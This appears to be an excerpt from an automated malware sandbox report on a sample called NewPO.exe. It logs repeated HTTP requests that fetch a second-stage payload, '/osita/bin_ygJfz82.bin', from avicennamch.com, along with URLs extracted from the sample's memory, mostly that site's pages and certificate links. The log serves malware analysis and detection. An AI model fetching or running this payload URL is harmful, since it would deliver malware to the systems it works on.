    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /osita/bin_ygJfz82.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: avicennamch.comCache-Control: no-cache
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=210115193827189&ev=PageView equals www.facebook.com (Facebook)
    Source: unknownDNS traffic detected: queries for: avicennamch.com
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.bin
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.bin#
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.bin&0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.bin)
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.bin0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.binK
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.binMh2
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.binT
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.binX
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.bincrl0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.binital
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.binmch.com
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.bins
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.binternet
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.binw
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://avicennamch.com/osita/bin_ygJfz82.binx
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://r3.i.lencr.org/0-
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://r3.o.lencr.org0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://x1.c.lencr.org/0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/0
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/f
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https:////maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=5.4.5
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmp, NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/#website
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/2020/03/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/2020/03/31/inauguration-of-avicenna-dental-college/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/2020/10/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/2020/10/08/pakistan-association-of-private-medical-dental-institutions-pami/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/2020/10/08/sehat-insaf-card-program-of-government-of-pakistan/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/?page_id=2452
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/?page_id=3669
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/?page_id=3671
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/?s=
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/abdul-waheed-trust/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/about-us/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adc-dental-materials/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/adc-events/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adc-oral-biology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adc-oral-medicine/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adc-oral-pathology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adc-oral-surgery/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adc-orthodontics/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adc-periodontology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adc-prosthodontics/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/adc-sports-day/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/adc-student-testimonials/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adc/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adh-dental-materials/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/adh-operative-dentistry/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/adh-oral-mexillofacial-surgery/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/adh-oral-pathology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adh-orthodontics/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/adh-periodontology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/adh-prosthodontics/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/admissions-bds/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/admissions-criteria-for-foreign-students/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/admissions-mbbs/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/admissions/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/allied-health-sciences/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-basic-sciences-biochemistry/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-basic-sciences-community-medicine/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-basic-sciences-forensic-medicine/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-basic-sciences-pathology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-basic-sciences-pharmacology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-basic-sciences-physiology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-bcs-anatomy/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-anesthesiology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-dermatology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-ent/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmp, NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-medicine/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-obstetrics-and-gynecology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-ophthalmology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-orthopedics/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-paediatrics/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-psychiatry-and-behavioral-sciences/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-radiology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc-clinical-sciences-surgery/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/amc-student-testimonials/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amc/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amh-anesthesiology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amh-dermatology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amh-ent/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amh-obstetrics-and-gynecology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amh-ophthalmology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amh-paediatrics/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amh-radiology/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/amh-surgery/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/avicenna-dental-hospital/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/avicenna-medical-hospital-medicine/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/avicenna-medical-hospital/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/blank/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/careers-working/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/careers/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/category/main-news/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/category/uncategorized/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/chairman-awt/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/co-chairperson-admin-legal-and-finanace/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/co-chairperson-development-and-coordination/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/comments/feed/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/contact-us/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/covid-19/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/director-adil-hospital/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/events-avicenna-medical-college/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/fee-schedules/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/feed/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/gnc/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/in
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/life-at-adc/
    Source: NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpString found in binary or memory: https://avicennamch.com/life-at-amc-excursion-and-trips/
    Source: NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpString found in binary or memory: https://avicennamch.com/life-at-amc/
